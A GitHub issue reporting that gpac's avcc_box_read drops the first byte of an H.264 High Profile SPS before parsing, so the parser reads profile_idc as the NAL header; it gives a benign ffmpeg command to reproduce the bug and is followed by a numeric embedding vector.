This is a GitHub Issue repo:gpac owner:gpac Title : avcc_box_read : Invalid parsing of SPS from AVCC atom for H264 High Profile? Issue date: --- start body --- generating a sample Mp4 file using ffmpeg and encoding it to 264 high profile `ffmpeg -f lavfi -i testsrc=size=1920x1080:duration=0.5 -c:v libx264 -profile:v high -level:v 4.0 -pix_fmt yuv420p -y /tmp/main.mp4` the function [avcc_box_read](https://github.com/gpac/gpac/blob/master/src/isomedia/avc_ext.c#L2675) extract the SPS/PPS from the AVCC atom. The first byte of the sequenceParameterSets buffer will contain the nal_hdr. Then, there is a [test](https://github.com/gpac/gpac/blob/master/src/isomedia/avc_ext.c#L2731) checking for the profile and if the profile is 100, the code will be calling [gf_avc_read_sps](https://github.com/gpac/gpac/blob/master/src/isomedia/avc_ext.c#L2737) while removing the 1st byte of the sequenceParameterSets buffer. `idx = sl ? gf_avc_read_sps(sl->data+1, sl->size-1, &avc, 0, NULL) : -1;` This function will then call [gf_avc_read_sps_bs](https://github.com/gpac/gpac/blob/master/src/media_tools/av_parsers.c#L5402) which will call [gf_avc_read_sps_bs_internal](https://github.com/gpac/gpac/blob/master/src/media_tools/av_parsers.c#L5091) with nal_hdr being set to 0. `return gf_avc_read_sps_bs_internal(bs, avc, subseq_sps, vui_flag_pos, 0);` Which then in the [code](https://github.com/gpac/gpac/blob/master/src/media_tools/av_parsers.c#L5106), will try to parse the 1st byte of the bitstream as nal_hdr. However, it seems we did remove the byte in avcc_box_read and instead of parsing the nal_hdr, we will be parsing the profile_idc Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ --- end body ---
2,374
[ -0.0355173796415329, 0.03358841687440872, -0.0076584345661103725, -0.0007161842077039182, 0.02222898043692112, 0.015936892479658127, -0.015209704637527466, 0.035976655781269073, -0.0008711899863556027, 0.016947301104664803, 0.0035058101639151573, -0.00517834210768342, 0.0316900759935379, 0.017835235223174095, 0.029577402397990227, 0.014735119417309761, -0.01073175948113203, -0.0019404429476708174, 0.021249189972877502, -0.004868330433964729, 0.04075312986969948, -0.0369870625436306, -0.007639298215508461, 0.04892824962735176, 0.00481474818661809, -0.006617408245801926, -0.018784405663609505, 0.01864662393927574, 0.007298667915165424, -0.010593976825475693, 0.03377212956547737, 0.025857264176011086, -0.004550664220005274, 0.02109609730541706, 0.05468451604247093, 0.004359298851341009, 0.038426127284765244, 0.050152987241744995, -0.01091547030955553, 0.018386367708444595, -0.010272483341395855, -0.045315276831388474, -0.023652736097574234, 0.005040558986365795, -0.004030150827020407, -0.008282285183668137, 0.021233880892395973, -0.005075004883110523, -0.04699929058551788, -0.02503056637942791, 0.0050788321532309055, 0.013242471031844616, -0.010088772512972355, -0.050183605402708054, -0.01645740494132042, -0.05205133184790611, 0.033343467861413956, 0.02749534882605076, 0.012729612179100513, 0.05428647622466087, -0.005105623044073582, 0.02616344764828682, -0.00531995203346014, 0.027924006804823875, 0.012920977547764778, 0.010272483341395855, -0.009131946600973606, 0.00700396578758955, -0.021356355398893356, 0.01343383640050888, -0.006433697417378426, -0.045958261936903, 0.04739733040332794, 0.021004242822527885, 0.0073216320015490055, -0.023989539593458176, 0.051255252212285995, 0.04877515882253647, 0.002439906122162938, 0.030495956540107727, -0.05358225107192993, 0.003980395849794149, -0.050918448716402054, 0.02558169700205326, 0.018248584121465683, 0.013181233778595924, -0.050734736025333405, -0.05805254355072975, -0.013510381802916527, -0.017590288072824478, -0.022718874737620354, 0.028322046622633934, 0.024387579411268234, -0.029378382489085197, -0.0011185294715687633, 0.03217997029423714, -0.018187347799539566, -0.016181839630007744, -0.017973018810153008, -0.02092769742012024, -0.02057558484375477, -0.0012610965641215444, 0.01093077939003706, -0.0008305248920805752, 0.03533366695046425, -0.024066084995865822, -0.0010592063190415502, -0.029470238834619522, -0.004596591927111149, 0.13227161765098572, 0.01755966991186142, 0.0233465526252985, -0.0035670469515025616, 0.005404152907431126, 0.006468143314123154, -0.000661645142827183, -0.030128534883260727, -0.009935680776834488, -0.022458618506789207, -0.009660114534199238, -0.011550802737474442, -0.0019404429476708174, -0.014467207714915276, 0.020100999623537064, -0.00943047646433115, 0.04053879901766777, -0.00821339339017868, 0.004366953391581774, -0.005584036000072956, -0.03606851026415825, -0.016947301104664803, -0.02206057868897915, 0.02336186170578003, -0.022917894646525383, -0.022871967405080795, -0.008626742288470268, -0.024326343089342117, 0.007976100780069828, 0.0007357991416938603, 0.03009791672229767, -0.05404152721166611, -0.004925739951431751, 0.040048904716968536, 0.00155197165440768, 0.003283826634287834, 0.006475797854363918, -0.0016122516244649887, 0.0034407461062073708, -0.04020199924707413, -0.009583568200469017, -0.04470290616154671, -0.02169315703213215, -0.010471503250300884, 0.01167327631264925, 0.060961294919252396, 0.007279531564563513, 0.01569194532930851, 0.0012161257909610868, 0.010578667744994164, -0.020499039441347122, -0.00906305480748415, -0.03903849795460701, 0.01754436083137989, -0.014849938452243805, 0.0015577125595882535, -0.03066435642540455, 0.00452387286350131, 0.004657828714698553, -0.023958921432495117, 0.010586322285234928, 0.013877803459763527, -0.002818809123709798, 0.013058760203421116, -0.0027824498247355223, -0.05097968503832817, -0.05961408093571663, 0.011711549013853073, 0.036497168242931366, -0.03190440312027931, -0.01662580668926239, -0.03658902272582054, -0.0070345839485526085, -0.005538108292967081, 0.0012917149579152465, -0.0025642935652285814, -0.04056942090392113, 0.049387525767087936, -0.017651524394750595, 0.028612922877073288, -0.006720745470374823, 0.03453758731484413, 0.03533366695046425, 0.009001818485558033, 0.00732928654178977, 0.004416708368808031, -0.02369866520166397, -0.007788563147187233, -0.052939265966415405, -0.03023569844663143, 0.006720745470374823, 0.02150944620370865, -0.015998128801584244, -0.026025665923953056, -0.003907677251845598, -0.025811336934566498, -0.00895589031279087, -0.004255961626768112, 0.05416400358080864, -0.013755329884588718, -0.04601949825882912, -0.04093683883547783, -0.05946099013090134, 0.00794548261910677, 0.004657828714698553, -0.01567663624882698, 0.0089711993932724, -0.04203910380601883, 0.004757338669151068, -0.01883033476769924, -0.008366486057639122, 0.04702990874648094, -0.018202656880021095, 0.046417538076639175, -0.014352388679981232, -0.01306641474366188, 0.013204197399318218, -0.010517430491745472, -0.015485270880162716, -0.01540107000619173, 0.024954019114375114, 0.044733524322509766, 0.006927419453859329, -0.0051821693778038025, -0.00528167886659503, 0.02300974912941456, -0.007543615531176329, -0.016931992024183273, -0.0004334421537350863, -0.022075887769460678, 0.009484058246016502, -0.020407183095812798, 0.011351782828569412, -0.015630709007382393, 0.012783193960785866, -0.03622160106897354, 0.08560913056135178, -0.006456661503762007, 0.014375352300703526, -0.03121548891067505, 0.020652130246162415, 0.02201465144753456, 0.014245224185287952, 0.01530921459197998, 0.035792943090200424, 0.009575913660228252, 0.029010962694883347, 0.017268793657422066, -0.016472715884447098, -0.024249795824289322, -0.008465996012091637, 0.021356355398893356, -0.013372599147260189, -0.007180021610110998, -0.023025058209896088, -0.004072251264005899, -0.015768490731716156, -0.007532133720815182, -0.021157335489988327, 0.004424362909048796, -0.03456820547580719, 0.059124186635017395, 0.019580485299229622, -0.028475139290094376, -0.012492319568991661, -0.011635003611445427, 0.002602566499263048, -0.00972135178744793, -0.03527243062853813, 0.023851756006479263, 0.035792943090200424, -0.04761165753006935, -0.0012496146373450756, 0.008465996012091637, 0.027235092595219612, -0.008251667022705078, -0.02224428951740265, -0.02036125585436821, -0.012400464154779911, -0.0281995739787817, -0.010792996734380722, 0.011014980264008045, 0.017406577244400978, -0.0739741250872612, 0.02467845380306244, -0.0007334070396609604, -0.010479157790541649, -0.016488024964928627, -0.00003686769923660904, 0.0184935312718153, 0.004049287177622318, -0.03159821778535843, 0.04516218230128288, -0.015362797304987907, -0.003811994567513466, -0.049050722271203995, 0.013885458000004292, -0.032792337238788605, 0.007336941082030535, 0.01196415163576603, -0.0055763814598321915, 0.012117243371903896, -0.024510052055120468, -0.010785342194139957, -0.008886999450623989, -0.01889157108962536, -0.0038770586252212524, -0.002960419515147805, -0.01659518852829933, 0.00045401390525512397, 0.0010180628160014749, -0.008067956194281578, 0.005591690540313721, -0.03631345555186272, 0.015255632810294628, 0.015936892479658127, -0.012369845062494278, -0.02575009874999523, 0.0005520885461010039, -0.06123685836791992, 0.012545901350677013, 0.009866788983345032, -0.0058825658634305, 0.026990145444869995, -0.01584503799676895, 0.023775210604071617, -0.019274301826953888, -0.014880556613206863, -0.007015447597950697, 0.009422821924090385, -0.02954678423702717, -0.002290641190484166, 0.003827303647994995, 0.03153698146343231, 0.02467845380306244, -0.022305525839328766, -0.012553555890917778, -0.01665642485022545, -0.007999064400792122, 0.012186135165393353, 0.013663474470376968, 0.001026674173772335, 0.020407183095812798, 0.008420067839324474, 0.00941516738384962, 0.008381795138120651, -0.01429880689829588, 0.006674817763268948, -0.018355747684836388, 0.025841955095529556, 0.001374002080410719, 0.02051434852182865, -0.03364965319633484, -0.006713090464472771, 0.00803733803331852, 0.006020348519086838, -0.0009180744527839124, -0.002881959779188037, 0.0184935312718153, 0.019672341644763947, -0.035425521433353424, -0.034292642027139664, 0.026377776637673378, -0.05627667158842087, 0.034292642027139664, -0.04635630175471306, -0.04298827424645424, 0.003695261664688587, -0.009032436646521091, -0.03860983997583389, 0.01977950520813465, -0.0441211573779583, 0.019580485299229622, 0.016120603308081627, -0.04442734271287918, 0.008443032391369343, 0.0038502675015479326, 0.008550196886062622, 0.02616344764828682, -0.04108993336558342, -0.024709071964025497, -0.01752905175089836, 0.011076216585934162, 0.00859612412750721, -0.06527849286794662, -0.022137124091386795, 0.035394903272390366, -0.046448156237602234, -0.029470238834619522, 0.009560604579746723, -0.0380893275141716, 0.04874454066157341, -0.005545762833207846, -0.007830663584172726, 0.009239111095666885, 0.010226555168628693, 0.04320260509848595, 0.0017299412284046412, -0.007907208986580372, 0.01684013567864895, 0.00024112012761179358, 0.02074398659169674, -0.02056027576327324, -0.010754723101854324, -0.012844431214034557, 0.01243108231574297, -0.007287186104804277, 0.0015682376688346267, 0.007868936285376549, -0.04702990874648094, 0.022565782070159912, 0.01887626200914383, 0.00932331196963787, -0.005247233435511589, -0.005756264552474022, 0.032424915581941605, 0.021631920710206032, -0.013479763641953468, 0.036864589899778366, 0.03619098290801048, -0.03153698146343231, 0.02051434852182865, -0.023055678233504295, -0.013035796582698822, -0.016687044873833656, -0.019840741530060768, 0.007447932846844196, -0.05174514651298523, -0.012186135165393353, -0.007999064400792122, -0.012752575799822807, -0.019657032564282417, 0.027541277930140495, -0.014520790427923203, -0.012852085754275322, 0.03340470790863037, -0.020667439326643944, -0.0181261096149683, -0.016579879447817802, -0.0013864407083019614, -0.0013634769711643457, -0.012538246810436249, 0.05682780593633652, -0.018616005778312683, -0.015278596431016922, -0.012714303098618984, -0.0005425203125923872, -0.01827920228242874, 0.0031077705789357424, 0.04693805053830147, 0.004232998006045818, -0.021172644570469856, 0.025459224358201027, 0.03864045813679695, -0.029776422306895256, 0.06674817949533463, 0.037997469305992126, -0.036344077438116074, -0.0029776422306895256, 0.021172644570469856, -0.006012693978846073, 0.016947301104664803, -0.010333719663321972, -0.011788095347583294, 0.01717693917453289, -0.0029470238368958235, 0.004328680690377951, -0.01354100089520216, -0.0057141645811498165, -0.0068814922124147415, -0.06056325510144234, 0.031506363302469254, -0.0026618896517902613, 0.01476573757827282, 0.014536099508404732, -0.010800651274621487, -0.004891294054687023, -0.01752905175089836, 0.009040091186761856, 0.0035058101639151573, -0.01642678678035736, 0.0115814208984375, 0.007225949317216873, -0.013893112540245056, -0.020621512085199356, 0.009529986418783665, 0.0026083074044436216, 0.014719810336828232, 0.00112139992415905, 0.02167784795165062, 0.004699929151684046, -0.004780302289873362, -0.014183987863361835, 0.0007204899447970092, 0.019657032564282417, 0.023208769038319588, -0.03383336588740349, 0.013288398273289204, 0.03603789210319519, -0.029194671660661697, -0.025290822610259056, -0.016289005056023598, -0.0006788679747842252, -0.0034905008506029844, -0.034813154488801956, -0.010685832239687443, -0.03432326018810272, 0.0029087509028613567, -0.0050903139635920525, 0.03775252401828766, -0.018937498331069946, -0.032608628273010254, -0.04047756269574165, -0.017697451636195183, 0.006827909965068102, 0.022167742252349854, 0.009966298937797546, -0.010157664306461811, -0.003075238550081849, 0.01120634563267231, 0.03922220692038536, -0.040630657225847244, -0.019381465390324593, -0.012209098786115646, 0.0006348540191538632, 0.005871084053069353, -0.01399262249469757, -0.007467069663107395, 0.027219783514738083, 0.016533952206373215, -0.016931992024183273, -0.040630657225847244, 0.02930183708667755, -0.02282603830099106, 0.026454323902726173, -0.012040697038173676, 0.018172038719058037, -0.005886393133550882, 0.026423703879117966, -0.012683684006333351, -0.021142026409506798, -0.0005989730125293136, -0.008856380358338356, -0.0051745143719017506, 0.018952807411551476, 0.011152762919664383, 0.026653341948986053, 0.011757477186620235, 0.027326948940753937, 0.027786225080490112, 0.003209194168448448, -0.00850426871329546, 0.013502727262675762, 0.003234071657061577, -0.027219783514738083, -0.0055648996494710445, 0.006422215607017279, -0.005289333872497082, 0.023652736097574234, -0.017835235223174095, -0.006889146752655506, 0.006161958910524845, -0.001646697404794395, 0.02034594677388668, -0.004064596723765135, -0.013181233778595924, 0.016396168619394302, 0.0003415868559386581, -0.015554161742329597, -0.012760230340063572, -0.007390523329377174, -0.012446391396224499, -0.03175131231546402, -0.007788563147187233, -0.015301560051739216, 0.02391299419105053, -0.004275098443031311, 0.023989539593458176, -0.01677889935672283, -0.03643593192100525, -0.018799716606736183, 0.004914258141070604, 0.02146351896226406, -0.002200699644163251, -0.010150009766221046, 0.022152433171868324, -0.013877803459763527, 0.005304642952978611, 0.021540064364671707, 0.012653065845370293, 0.014918829314410686, -0.019519248977303505, 0.04047756269574165, -0.00998926255851984, 0.0020629167556762695, -0.0008678411250002682, 0.009147255681455135, 0.0007257524412125349, -0.00876452587544918, -0.01261479314416647, 0.02651556022465229, 0.0051745143719017506, 0.008006718941032887, 0.03790561482310295, 0.002290641190484166, 0.026990145444869995, 0.012423427775502205, 0.03603789210319519, 0.0018859038827940822, 0.0013749588979408145, 0.005476871505379677, 0.01494944840669632, -0.024326343089342117, 0.01884564384818077, -0.03190440312027931, 0.009660114534199238, 0.03977334126830101, 0.013556309975683689, -0.02201465144753456, 0.002772881416603923, -0.011037943884730339, -0.03600727394223213, 0.028888488188385963, 0.005740955471992493, -0.019274301826953888, 0.0027881907299160957, -0.018723169341683388, 0.015018339268863201, -0.0093386210501194, 0.0031077705789357424, -0.0034694508649408817, -0.002051434712484479, -0.007922518998384476, -0.0347825363278389, 0.012637756764888763, -0.02501525729894638, 0.02201465144753456, 0.010869542136788368, -0.004864503163844347, 0.0034771054051816463, -0.005289333872497082, -0.004569800570607185, -0.03860983997583389, 0.004872157704085112, 0.016855444759130478, 0.024356961250305176, 0.002820722758769989, 0.04519280046224594, 0.050520408898591995, 0.008312903344631195, -0.01682482659816742, -0.014092132449150085, 0.00780004495754838, 0.02653086930513382, -0.01665642485022545, -0.01811080053448677, 0.02109609730541706, -0.03383336588740349, 0.019366156309843063, 0.015829728916287422, -0.0009075494017452002, 0.018937498331069946, 0.0005516101373359561, 0.004581282380968332, 0.017865853384137154, 0.00457745511084795, -0.024709071964025497, 0.0009836170356720686, 0.01018828246742487, 0.018968116492033005, 0.00832055788487196, 0.017483122646808624, -0.009499367326498032, -0.028842560946941376, 0.017819926142692566, -0.034476350992918015, 0.007432623766362667, -0.004056941717863083, -0.0285669956356287, -0.029179362580180168, -0.028827251866459846, 0.02781684324145317, 0.004933394491672516, 0.013188888318836689, 0.04730547219514847, 0.002393978415057063, -0.003207280533388257, 0.022642329335212708, -0.005052040796726942, 0.000038332836993504316, -0.002437992487102747, -0.04011014103889465, -0.007876590825617313, -0.022703565657138824, -0.022917894646525383, -0.005258715245872736, 0.006234677508473396, 0.005652927327901125, -0.019381465390324593, 0.006900628563016653, 0.00682408269494772, 0.011428329162299633, 0.020820531994104385, 0.012385155074298382, 0.009124292060732841, 0.00812153797596693, 0.009453440085053444, -0.0015950287925079465, -0.00027580506866797805, -0.030189771205186844, -0.008695634081959724, 0.02033063769340515, -0.01644209586083889, -0.018922189250588417, -0.005480698775500059, 0.0029489374719560146, 0.013257780112326145, 0.021555373445153236, 0.029194671660661697, 0.004680792335420847, 0.005377361550927162, -0.013510381802916527, -0.02333124354481697, 0.03121548891067505, 0.010218900628387928, -0.018585387617349625, -0.004053114447742701, -0.01772806979715824, -0.017682142555713654, 0.032210588455200195, 0.021432900801301003, -0.004730547312647104, -0.0053697070106863976, -0.010402611456811428, -0.027602514252066612, -0.01679420843720436, -0.008825762197375298, 0.0024035468231886625, -0.016564570367336273, -0.06638075411319733, 0.01243108231574297, 0.030909305438399315, 0.03337408974766731, 0.017253484576940536, -0.03585417941212654, -0.01774338074028492, 0.002185390330851078, 0.009606531821191311, -0.02372928336262703, -0.011145108379423618, 0.003471364500001073, 0.002780536189675331, -0.005316124763339758, -0.01661049760878086, -0.008680325001478195, -0.00932331196963787, -0.01420695148408413, 0.030021369457244873, -0.0020590894855558872, 0.01315827015787363, 0.002656148746609688, 0.007107303012162447, 0.013043451122939587, -0.0026944216806441545, -0.02392830327153206, 0.005652927327901125, -0.030388791114091873, -0.016748281195759773, -0.0008549239719286561, 0.005216614808887243, -0.023668045178055763, -0.03383336588740349, -0.006969519890844822, -0.0340476930141449, 0.026255303993821144, 0.015393415465950966, -0.03193502128124237, 0.015615398995578289, -0.017819926142692566, -0.012660720385611057, 0.00190408353228122, 0.005614654626697302, -0.0064069065265357494, 0.026117520406842232, -0.030572501942515373, 0.008948235772550106, -0.007134093903005123, 0.0050329044461250305, 0.010892506688833237, -0.02108078822493553, -0.005457735154777765, 0.012576519511640072, -0.005113277584314346, -0.023162841796875, -0.03741572052240372, -0.0072297765873372555, -0.01699322834610939, -0.00841241329908371, 0.018983425572514534, -0.004948703572154045, 0.02368335612118244, -0.027969935908913612, -0.0013778293505311012, 0.04259023442864418, -0.011451292783021927, 0.013954348862171173, -0.010318410582840443, 0.009024782106280327, -0.0061083766631782055, -0.013364944607019424, 0.027770916000008583, -0.021723775193095207, 0.021723775193095207, 0.025137729942798615, -0.04804031550884247, 0.01380891166627407, -0.039497774094343185, -0.00653320737183094, 0.026439012959599495, 0.0192283745855093, 0.012492319568991661, -0.0002958984114229679, -0.012331572361290455, 0.008297594264149666, 0.02914874441921711, -0.01662580668926239, 0.018753787502646446, -0.002952764742076397, 0.004087560344487429, -0.03193502128124237, -0.0005439555388875306, -0.010203591547906399, -0.024693762883543968, -0.01150487456470728, -0.023867065086960793, -0.004378435201942921, -0.010701141320168972, 0.006464316044002771, 0.007069029845297337, 0.00448942743241787, 0.011703894473612309, 0.011060907505452633, 0.012622447684407234, -0.004826229996979237, 0.012277990579605103, -0.018233275040984154, 0.013617546297609806, -0.023086296394467354, -0.00980555173009634, 0.02893441542983055, -0.03172069415450096, 0.008427722379565239, 0.012744921259582043, -0.019947906956076622, -0.01045619323849678, -0.0015998129965737462, -0.01737595908343792, -0.009476403705775738, -0.02299444004893303, -0.0011280977632850409, -0.0025623799301683903, -0.028995653614401817, -0.03133796155452728, -0.0028628231957554817, 0.004217688459903002, -0.022504545748233795, 0.011420674622058868, 0.01063990406692028, -0.020820531994104385, -0.021341044455766678, 0.03756881132721901, 0.0020724849309772253, 0.01428349781781435, -0.013319016434252262, 0.00867267046123743, 0.024356961250305176, -0.015270941890776157, 0.007015447597950697, -0.03413954749703407, -0.03793623298406601, -0.011175726540386677, 0.021233880892395973, -0.020667439326643944, -0.00950702279806137, 0.02313222363591194, -0.0030905476305633783, 0.03628283739089966, -0.007650780025869608, -0.04393744468688965, -0.007976100780069828, -0.0179423987865448, -0.009660114534199238, 0.0013338152784854174, 0.0044549815356731415, -0.00917021930217743, -0.00453918194398284, -0.028811942785978317, 0.030327554792165756, 0.020682748407125473, -0.015646018087863922, -0.003519205842167139, 0.0184935312718153, -0.01521735917776823, -0.010073463432490826, -0.03377212956547737, -0.00019088677072431892, 0.012033042497932911, -0.01513315923511982, 0.01223206240683794, 0.01700853742659092, 0.027755606919527054, 0.005270197056233883, 0.01907528191804886, -0.03045002743601799, 0.026071593165397644, -0.0012323918053880334, -0.043080128729343414, -0.03815056383609772, -0.0021394628565758467, -0.00277862255461514, 0.012201444245874882, 0.011719203554093838, -0.01959579437971115, 0.009399858303368092, -0.006161958910524845, 0.014183987863361835, -0.01999383419752121, -0.026791125535964966, -0.01645740494132042, 0.016166530549526215, -0.025137729942798615, 0.0008434420451521873, 0.029745804145932198, 0.009484058246016502, -0.006399251986294985, -0.011535493656992912, 0.01887626200914383, 0.004011014476418495, -0.012943941168487072, -0.033527180552482605, -0.028995653614401817, 0.00261596217751503, -0.010708795860409737, -0.04200848564505577, -0.006785809528082609, -0.00523192435503006, 0.00310394330881536, -0.018432294949889183, -0.01456671766936779, -0.020100999623537064, 0.028919106349349022, 0.016962610185146332, 0.013273089192807674, -0.001328074373304844, -0.010525085031986237, 0.0036282839719206095, -0.012905668467283249, -0.027173856273293495, -0.0073331138119101524, -0.0027097309939563274, -0.017620906233787537, 0.02369866520166397, -0.013686438091099262, -0.006315051112323999, 0.032578010112047195, 0.005243406165391207, 0.037813760340213776, 0.021448209881782532, -0.048499591648578644, -0.002348050707951188, -0.009644805453717709, -0.002070571295917034, -0.01907528191804886, 0.02688298188149929, -0.017268793657422066, 0.00013670649786945432, -0.030970541760325432, 0.003339322516694665, 0.010846578516066074, -0.02429572306573391, -0.0005071177147328854, -0.0021241535432636738, 0.010387302376329899, 0.020453110337257385, -0.037813760340213776, 0.035976655781269073, 0.025719480589032173, 0.031659457832574844, 0.009797897189855576, -0.00045233944547362626, -0.052388131618499756, -0.013127651996910572, -0.02726571075618267, 0.0075168246403336525, 0.01297455932945013, 0.00003534275674610399, 0.01754436083137989, -0.013563964515924454, 0.005063522607088089, -0.044917237013578415, 0.0025604660622775555, -0.0036321112420409918, -0.02282603830099106, -0.009866788983345032, -0.023989539593458176, -0.005101795773953199, -0.0016811431851238012, -0.018539458513259888, 0.007551270071417093, 0.03487439081072807, 0.01737595908343792, -0.004692274145781994, 0.0011816800106316805, -0.008841071277856827, 0.00016110556316561997, 0.00895589031279087, 0.016503334045410156, -0.011719203554093838, -0.0020342119969427586, 0.01644209586083889, 0.015301560051739216, 0.008381795138120651, -0.01402324065566063, 0.0032417261973023415, -0.012017733417451382, -0.007635470945388079, 0.000512380269356072, 0.008381795138120651, -0.03573170676827431, -0.019136518239974976, 0.0062117138877511024, 0.03888540714979172, 0.01270664855837822, -0.03383336588740349, -0.03230244293808937, 0.00982086081057787, 0.03827303647994995, 0.011680930852890015, 0.011060907505452633, -0.006047139875590801, -0.0008329169359058142, -0.001995938830077648, -0.006173440720885992, 0.06815662235021591, -0.000014800901226408314, -0.006506416480988264, 0.0018524150364100933, -0.007999064400792122, 0.0013452972052618861, 0.006693954113870859, -0.007868936285376549, -0.0032876539044082165, -0.020208163186907768, 0.002041866537183523, -0.0347825363278389, -0.029194671660661697, -0.015561817213892937, -0.026377776637673378, 0.02074398659169674, 0.00962949637323618, -0.0030197426676750183, 0.01622776687145233, -0.004592764191329479, -0.008274630643427372, -0.026469632983207703, 0.020805222913622856, -0.00961418729275465, 0.01902935467660427, -0.006935074459761381, -0.01364816538989544, -0.01962641254067421, -0.004856848157942295, -0.028490448370575905, 0.00419855210930109, 0.025887882336974144, -0.03830365464091301, 0.017651524394750595, 0.00453918194398284, -0.01541637908667326, 0.004990804009139538, -0.0032436398323625326, -0.018064873293042183, -0.018631314858794212, -0.025352058932185173, -0.019519248977303505, -0.03668087720870972, 0.03511933982372284, 0.007072857115417719, 0.10306163132190704, 0.020499039441347122, -0.0009864874882623553, -0.017804617062211037, -0.012499974109232426, -0.0021318080835044384, 0.009774933569133282, 0.01270664855837822, 0.014880556613206863, -0.005308470223098993, 0.02989889681339264, 0.0009797897655516863, -0.00573712820187211, -0.002378669334575534, 0.0190446637570858, -0.0017069774912670255, -0.005580208729952574, -0.00774646271020174, 0.00917021930217743, 0.009185528382658958, 0.02166253887116909, 0.01907528191804886, 0.019488630816340446, -0.017467813566327095, 0.01889157108962536, -0.02875070460140705, -0.008856380358338356, -0.010502121411263943, -0.0017021932872012258, 0.006161958910524845, 0.0032111078035086393, -0.025811336934566498, -0.01224737148731947, 0.009055400267243385, 0.02186155878007412, -0.008749215863645077, 0.013556309975683689, -0.016886064782738686, -0.008374140597879887, -0.02878132462501526, -0.002305950503796339, -0.004275098443031311, -0.00508648669347167, 0.008848725818097591, -0.002380582969635725, -0.032026875764131546, 0.021386973559856415, 0.012836776673793793, -0.005377361550927162, -0.01558478083461523, 0.00401866901665926, -0.04565207660198212, 0.0016610497841611505, 0.03720139339566231, -0.008733906783163548, -0.0027403493877500296, -0.01438300684094429, 0.016870753839612007, 0.005105623044073582, -0.008481305092573166, 0.0031728348694741726, -0.005105623044073582, 0.03508872166275978, 0.007245085667818785, 0.018248584121465683, -0.010142355225980282, -0.005109450314193964, 0.013518036343157291, -0.002127980813384056, 0.006808773148804903, 0.01402324065566063, -0.008450686931610107, 0.001851458102464676, -0.011367091909050941, 0.020483728498220444, 0.03496624529361725, 0.0024915747344493866, -0.008810453116893768, -0.028735395520925522, -0.0076125068590044975, 0.0013223334681242704, -0.0031096842139959335, 0.01138240098953247, 0.017881162464618683, -0.007091993931680918, -0.003473278135061264, 0.00943047646433115, -0.0026217030826956034, 0.0009620884666219354, -0.01924368366599083, -0.004099042154848576, -0.003180489409714937, 0.0026657169219106436, 0.02804648131132126, -0.013701747171580791, 0.011765131726861, -0.00620788661763072, -0.0031690073665231466, 0.005304642952978611, -0.0010802564211189747, 0.014229915104806423, 0.013831875286996365, 0.03900787979364395, 0.018187347799539566, -0.0019318315898999572, 0.0026638032868504524, 0.018600696697831154, 0.015829728916287422, 0.009660114534199238, -0.01884564384818077, -0.013984967954456806, -0.013326670974493027, -0.020116308704018593, -0.02467845380306244, -0.02259640023112297, -0.010770032182335854, 0.008006718941032887, 0.013755329884588718, 0.021034860983490944, -0.007325459271669388, -0.023759901523590088, -0.01736065000295639, 0.03196563944220543, -0.008909963071346283, 0.0016677476232871413, 0.0015127417864277959, -0.014413625933229923, -0.01168858539313078, 0.025688862428069115, 0.02409670315682888, 0.026209374889731407, 0.013969658873975277, -0.018937498331069946, -0.009216147474944592, 0.03643593192100525, -0.016151221469044685, 0.01261479314416647, 0.015140813775360584, 0.014781046658754349, -0.014712155796587467, 0.00926207471638918, 0.016886064782738686, 0.009208492934703827, 0.04130426049232483, 0.007532133720815182, 0.004405226558446884, 0.0069771744310855865, -0.01961110346019268, 0.02333124354481697, 0.004011014476418495, -0.0021968723740428686, -0.011129799298942089, 0.010900161229074001, 0.053153593093156815, 0.0034694508649408817, 0.010540394112467766, 0.014559063129127026, -0.0183098204433918, -0.03251677379012108, -0.007960791699588299, 0.014681536704301834, 0.024724381044507027, 0.026377776637673378, 0.0018418899271637201, 0.009652459993958473, 0.017973018810153008, -0.005928493570536375, -0.059124186635017395, -0.020100999623537064, -0.03263924643397331, 0.0041181789711117744, 0.008266976103186607, -0.008044992573559284, -0.021249189972877502, 0.022917894646525383, 0.018064873293042183, -0.028674159198999405, -0.016181839630007744, 0.020958315581083298, 0.0028130682185292244, -0.005289333872497082, 0.030495956540107727, 0.0022083541844040155, 0.01102263480424881, 0.0388241671025753, -0.03190440312027931, 0.031873784959316254, -0.011665621772408485, -0.03159821778535843, 0.025918500497937202, 0.011818713508546352, 0.021769702434539795, -0.014926484785974026, -0.000609019713010639, -0.02186155878007412, -0.015110194683074951, -0.01204835157841444, 0.02463252656161785, -0.011282891035079956, -0.012622447684407234, -0.021601302549242973, -0.001004667254164815, -0.00006614059384446591, -0.006383942440152168, 0.021999342367053032, -0.007976100780069828, -0.010632249526679516, -0.013035796582698822, -0.003042706521227956, -0.012844431214034557, -0.04069189354777336, 0.0009730919846333563, 0.0016667908057570457, 0.01775868982076645, 0.01625838689506054, -0.00867267046123743, 0.02654617838561535, -0.027924006804823875, -0.03138389065861702, 0.021249189972877502, -0.030756212770938873, 0.0192283745855093, 0.0020284708589315414, -0.006563825998455286, -0.03496624529361725, -0.007635470945388079, 0.04170230031013489, -0.008772180415689945, -0.018784405663609505, -0.009461094625294209, 0.0007300581783056259, 0.017314722761511803, 0.014964757487177849, 0.0010094513418152928, -0.004979322198778391, 0.004960185382515192, 0.020958315581083298, -0.007019274868071079, 0.011849332600831985, -0.029960133135318756, -0.012492319568991661, -0.0054845260456204414, -0.012017733417451382, 0.000587012676987797, 0.0037718077655881643, -0.0002392064779996872, -0.004810920916497707, 0.03922220692038536, 0.0034043865744024515, 0.005151550751179457, -0.03080214001238346, 0.016503334045410156, -0.008833416737616062, 0.0003664643154479563, -0.002748004160821438, 0.01624307595193386, -0.008244012482464314, -0.004175588488578796, 0.020499039441347122, 0.00704223895445466, 0.016304314136505127, -0.016380859538912773, -0.024203868582844734, 0.01624307595193386, -0.03925282508134842, 0.011696239933371544, -0.00941516738384962, 0.0011223568581044674, -0.01590627431869507, -0.0011271409457549453, -0.006885319482535124, 0.01962641254067421, 0.025275513529777527, 0.009101328440010548, -0.005607000086456537, 0.004952530842274427, 0.018585387617349625, -0.02948554791510105, -0.018386367708444595, 0.0035976655781269073, 